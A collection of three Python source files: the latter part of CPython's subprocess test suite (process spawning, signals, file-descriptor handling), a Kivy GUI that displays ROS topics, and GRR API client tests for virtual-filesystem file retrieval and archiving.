self.assertIn("os.chdir", c.exception.child_traceback)
def test_run_abort(self):
# returncode handles signal termination
with _SuppressCoreFiles():
p = subprocess.Popen([sys.executable, "-c",
"import os; os.abort()"])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# preexec function
p = subprocess.Popen([sys.executable, "-c",
"import sys, os;"
"sys.stdout.write(os.getenv('FRUIT'))"],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "apple")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(
self, args, executable, preexec_fn, close_fds, cwd, env,
universal_newlines, startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite):
try:
subprocess.Popen._execute_child(
self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (p2cwrite, c2pread, errread))
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise RuntimeError("force the _execute_child() errpipe_data path.")
with self.assertRaises(RuntimeError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_args_string(self):
# args is a string
f, fname = tempfile.mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_call_string(self):
# call() function with string argument on UNIX
f, fname = tempfile.mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), sh)
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn('KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
newfds = []
for a in fds:
b = os.dup(a)
newfds.append(b)
if a == 0:
stdin = b
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = test_support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
for b, a in zip(newfds, fds):
os.dup2(b, a)
for b in newfds:
os.close(b)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = [os.dup(fd) for fd in range(3)]
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = test_support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
for std, saved in enumerate(saved_fds):
os.dup2(saved, std)
os.close(saved)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = test_support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" % stderr)
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(EnvironmentError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_pipe_cloexec(self):
# Issue 12786: check that the communication pipes' FDs are set CLOEXEC,
# and are not inherited by another child process.
p1 = subprocess.Popen([sys.executable, "-c",
'import os;'
'os.read(0, 1)'
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen([sys.executable, "-c", """if True:
import os, errno, sys
for fd in %r:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
else:
sys.exit(1)
sys.exit(0)
""" % [f.fileno() for f in (p1.stdin, p1.stdout,
p1.stderr)]
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
p1.communicate('foo')
_, stderr = p2.communicate()
self.assertEqual(p2.returncode, 0, "Unexpected error: " + repr(stderr))
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
@unittest.skipUnless(getattr(subprocess, '_has_poll', False),
"poll system call not supported")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
subprocess._has_poll = False
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._has_poll = True
ProcessTestCase.tearDown(self)
class HelperFunctionTests(unittest.TestCase):
@unittest.skipIf(mswindows, "errno and EINTR make no sense on windows")
def test_eintr_retry_call(self):
record_calls = []
def fake_os_func(*args):
record_calls.append(args)
if len(record_calls) == 2:
raise OSError(errno.EINTR, "fake interrupted system call")
return tuple(reversed(args))
self.assertEqual((999, 256),
subprocess._eintr_retry_call(fake_os_func, 256, 999))
self.assertEqual([(256, 999)], record_calls)
# This time there will be an EINTR so it will loop once.
self.assertEqual((666,),
subprocess._eintr_retry_call(fake_os_func, 666))
self.assertEqual([(256, 999), (666,), (666,)], record_calls)
@unittest.skipUnless(mswindows, "mswindows only")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super(CommandsWithSpaces, self).setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super(CommandsWithSpaces, self).tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
ProcessTestCaseNoPoll,
HelperFunctionTests,
CommandsWithSpaces)
test_support.run_unittest(*unit_tests)
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
viewer.py
|
#Create Layout for GUI
from roshandlers.rosconnector import ROSConnector
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.uix.scrollview import ScrollView
from kivy.uix.checkbox import CheckBox
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from threading import Thread
from customwidgets.text import TextWidget
from customwidgets.plot import PlotWidget
from subscribers.subscriber import Subscriber
from signalslayout.signaldisplay import SignalDisplay
from signalslayout.signalselector import SignalSelector
from signalslayout.autoselector import WidgetSelect
from signalslayout.autoselector import AutoSelect
class SignalViewer(GridLayout):
signalselector=ObjectProperty(SignalSelector)
signaldisplay=ObjectProperty(SignalDisplay)
ros=ROSConnector()
counter=0
popup=ObjectProperty(None)
event=None
#Dictionary of all topics:
# {topic_name: {'active': True/False,'sub':subscriber}
# List of all subscribers
topics_dict={}
# Matching List with True for active subscriber
def __init__(self,**kwargs):
super(SignalViewer,self).__init__(**kwargs)
Clock.schedule_once(lambda dt: self.initROS(), 2)
def initROS(self):
#Connect to ROS? try to do it in parallel
t = Thread(target=self.ros.connect)
t.start()
self.event=Clock.schedule_interval(lambda dt: self.checkROS(), 1/10)
def checkROS(self):
if not self.ros.isOK():
self.counter=self.counter+1;
if self.counter==1:
self.popup = Popup(title='Connecting to ROS',
content=Label(text='Attempting connection'),
size_hint=(None, None), size=(200, 200))
self.popup.open()
elif self.counter>50:
self.popup.content=Label(text='ERROR: verify ROS')
else:
if self.popup is not None: self.popup.dismiss()
self.event.cancel()
self.build()
def build(self):
#Fill the list of topics
self.signalselector.setreferences(self,self.signaldisplay)
self.signaldisplay.setreferences(self,self.signalselector)
topics_list=self.ros.get_published_topics()
self.generateTopicsDict(topics_list)
self.signalselector.build()
self.signaldisplay.build()
#Try to do a hardcoded selection from a friend function#
#Experimental#
for topic_name in self.topics_dict:
if AutoSelect(topic_name):
print("AutoSelect: %s"%topic_name)
self.activateTopic(topic_name)
#####################################################
self.signalselector.populate()
self.enableUpdates()
def generateTopicsDict(self,topics_list):
#Take a list of topics and create the topics dictionary
for topic_entry in topics_list:
topic=topic_entry[0]
topic_type=topic_entry[1]
self.topics_dict[topic]={'type':topic_type,'active':False,'subs':None}
def enableUpdates(self):
self.event=Clock.schedule_interval(lambda dt: self.updateDisplay(), 1/10.0)
def disableUpdates(self):
self.event.cancel()
def updateDisplay(self):
self.signaldisplay.update()
def activateTopic(self,topic_name):
self.disableUpdates()
topic_type=self.topics_dict[topic_name]['type']
print("activate %s of type %s"%(topic_name,topic_type))
failed=True
try:
sub=Subscriber(topic_name,topic_type)
self.topics_dict[topic_name]['active']=True
self.topics_dict[topic_name]['subs']=sub
failed=False
except Exception as e:
print(e)
error_str="%s: \n\rType not supported"%topic_type
self.popup = Popup(title='Error',content=Label(text=error_str),size_hint=(None, None), size=(200, 200))
self.popup.open()
self.signalselector.populate()
if failed is not True:
#Try to do a hardcoded selection from a friend function#
#Experimental#
WidgetClass=WidgetSelect(topic_type)
print("Using widget:"+str(WidgetClass))
self.signaldisplay.add(topic_name,WidgetClass)
self.enableUpdates()
def deactivateTopic(self,topic_name):
self.disableUpdates()
topic_type=self.topics_dict[topic_name]['type']
print("deactivate %s of type %s"%(topic_name,topic_type))
self.topics_dict[topic_name]['active']=False
sub=self.topics_dict[topic_name]['subs']
sub.unsubscribe()
self.signaldisplay.remove(topic_name)
self.enableUpdates()
|
vfs_test.py
|
#!/usr/bin/env python
# Lint as: python3
# -*- encoding: utf-8 -*-
"""Tests for API client and VFS-related API calls."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import os
import threading
import time
import zipfile
from absl import app
import mock
from grr_api_client import errors
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import artifacts as rdf_artifacts
from grr_response_core.lib.rdfvalues import file_finder as rdf_file_finder
from grr_response_proto.api import vfs_pb2
from grr_response_server import artifact_registry
from grr_response_server.databases import db
from grr_response_server.flows.general import collectors
from grr_response_server.flows.general import file_finder
from grr_response_server.gui import api_integration_test_lib
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import action_mocks
from grr.test_lib import fixture_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
from grr.test_lib import vfs_test_lib
class ApiClientLibVfsTest(api_integration_test_lib.ApiIntegrationTest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibVfsTest, self).setUp()
self.client_id = self.SetupClient(0)
fixture_test_lib.ClientFixture(self.client_id)
def testGetFileFromRef(self):
file_ref = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads/a.txt")
self.assertEqual(file_ref.path, "fs/os/c/Downloads/a.txt")
file_obj = file_ref.Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads/a.txt")
self.assertFalse(file_obj.is_directory)
self.assertEqual(file_obj.data.name, "a.txt")
def testGetFileForDirectory(self):
file_obj = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads").Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads")
self.assertTrue(file_obj.is_directory)
def testListFiles(self):
files_iter = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads").ListFiles()
files_list = list(files_iter)
self.assertCountEqual(
[f.data.name for f in files_list],
["a.txt", "b.txt", "c.txt", "d.txt", "sub1", "中国新闻网新闻中.txt"])
def testGetBlob(self):
out = io.BytesIO()
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), b"Hello world")
def testGetBlobUnicode(self):
vfs_test_lib.CreateFile(
db.ClientPath.TSK("C.1000000000000000", ["c", "bin", "中国新闻网新闻中"]),
b"Hello world")
out = io.BytesIO()
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/bin/中国新闻网新闻中").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), b"Hello world")
def testGetBlobFailsWhenFileIsCorrupt(self):
_, blob_refs = vfs_test_lib.GenerateBlobRefs(10, "0")
# We write just the references, without actual data, simulating a case
# when blobs were not written to the blob store for some reason.
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS("C.1000000000000000", ["c", "bin", "test"]), blob_refs,
[])
out = io.BytesIO()
with self.assertRaises(errors.UnknownError):
self.api.Client(client_id=self.client_id).File(
"fs/os/c/bin/test").GetBlob().WriteToStream(out)
def testGetBlobWithOffset(self):
tsk = db.ClientPath.TSK("C.1000000000000000", ["c", "bin", "foobar"])
vfs_test_lib.CreateFile(tsk, b"Hello world")
out = io.BytesIO()
client = self.api.Client(client_id=self.client_id)
f = client.File("fs/tsk/c/bin/foobar")
f.GetBlobWithOffset(6).WriteToStream(out)
self.assertEqual(out.getvalue(), b"world")
def testGetBlobWithOffsetUnicode(self):
tsk = db.ClientPath.TSK("C.1000000000000000", ["c", "bin", "中"])
vfs_test_lib.CreateFile(tsk, b"Hello world")
out = io.BytesIO()
client = self.api.Client(client_id=self.client_id)
f = client.File("fs/tsk/c/bin/中")
f.GetBlobWithOffset(6).WriteToStream(out)
self.assertEqual(out.getvalue(), b"world")
def testGetFilesArchive(self):
timestamp = rdfvalue.RDFDatetime.Now()
zip_stream = io.BytesIO()
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/bin").GetFilesArchive().WriteToStream(zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertCountEqual(namelist, [
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/rbash",
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/bash"
])
for info in zip_fd.infolist():
self.assertGreater(info.compress_size, 0)
# Check that notification was pushed indicating the failure to the user.
pending_notifications = list(self.api.GrrUser().ListPendingNotifications(
timestamp=timestamp.AsMicrosecondsSinceEpoch()))
self.assertLen(pending_notifications, 1)
self.assertEqual(
pending_notifications[0].data.notification_type,
int(rdf_objects.UserNotification.Type.TYPE_FILE_ARCHIVE_GENERATED))
self.assertEqual(pending_notifications[0].data.reference.type,
pending_notifications[0].data.reference.VFS)
self.assertEqual(pending_notifications[0].data.reference.vfs.client_id,
self.client_id)
self.assertEqual(pending_notifications[0].data.reference.vfs.vfs_path,
"fs/tsk/c/bin")
def testGetFilesArchiveFailsWhenFirstFileBlobIsMissing(self):
_, blob_refs = vfs_test_lib.GenerateBlobRefs(10, "0")
# We write just the references, without actual data, simulating a case
# when blobs were not written to the blob store for some reason.
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.TSK("C.1000000000000000", ["c", "universe", "42"]),
blob_refs, [])
zip_stream = io.BytesIO()
timestamp = rdfvalue.RDFDatetime.Now()
with self.assertRaises(errors.UnknownError):
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/universe").GetFilesArchive().WriteToStream(zip_stream)
# Check that notification was pushed indicating the failure to the user.
pending_notifications = list(self.api.GrrUser().ListPendingNotifications(
timestamp=timestamp.AsMicrosecondsSinceEpoch()))
self.assertLen(pending_notifications, 1)
self.assertEqual(
pending_notifications[0].data.notification_type,
int(rdf_objects.UserNotification.Type
.TYPE_FILE_ARCHIVE_GENERATION_FAILED))
self.assertEqual(pending_notifications[0].data.reference.type,
pending_notifications[0].data.reference.VFS)
self.assertEqual(pending_notifications[0].data.reference.vfs.client_id,
self.client_id)
self.assertEqual(pending_notifications[0].data.reference.vfs.vfs_path,
"fs/tsk/c/universe")
def testGetFilesArchiveDropsStreamingResponsesWhenSecondFileBlobIsMissing(
self):
blob_data, blob_refs = vfs_test_lib.GenerateBlobRefs(1024 * 1024 * 10, "01")
# We write just the references, without actual data, simulating a case
# when blobs were not written to the blob store for some reason.
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.TSK("C.1000000000000000", ["c", "universe", "42"]),
blob_refs, blob_data[:1])
zip_stream = io.BytesIO()
timestamp = rdfvalue.RDFDatetime.Now()
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/universe").GetFilesArchive().WriteToStream(zip_stream)
with self.assertRaises(zipfile.BadZipfile):
zipfile.ZipFile(zip_stream)
# Check that notification was pushed indicating the failure to the user.
pending_notifications = list(self.api.GrrUser().ListPendingNotifications(
timestamp=timestamp.AsMicrosecondsSinceEpoch()))
self.assertLen(pending_notifications, 1)
self.assertEqual(
pending_notifications[0].data.notification_type,
int(rdf_objects.UserNotification.Type
.TYPE_FILE_ARCHIVE_GENERATION_FAILED))
self.assertEqual(pending_notifications[0].data.reference.type,
pending_notifications[0].data.reference.VFS)
self.assertEqual(pending_notifications[0].data.reference.vfs.client_id,
self.client_id)
self.assertEqual(pending_notifications[0].data.reference.vfs.vfs_path,
"fs/tsk/c/universe")
def testGetVersionTimes(self):
vtimes = self.api.Client(client_id=self.client_id).File(
"fs/os/c/Downloads/a.txt").GetVersionTimes()
self.assertLen(vtimes, 1)
def testRefresh(self):
operation = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads").Refresh()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testRefreshWaitUntilDone(self):
f = self.api.Client(client_id=self.client_id).File("fs/os/c/Downloads")
with flow_test_lib.TestWorker():
operation = f.Refresh()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
flow_test_lib.FinishAllFlowsOnClient(self.client_id)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testRefreshRecursively(self):
operation = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads").RefreshRecursively(
max_depth=5)
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testRefreshRecursivelyWaitUntilDone(self):
f = self.api.Client(client_id=self.client_id).File("fs/os/c/Downloads")
with flow_test_lib.TestWorker():
operation = f.RefreshRecursively(max_depth=5)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
flow_test_lib.FinishAllFlowsOnClient(self.client_id)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
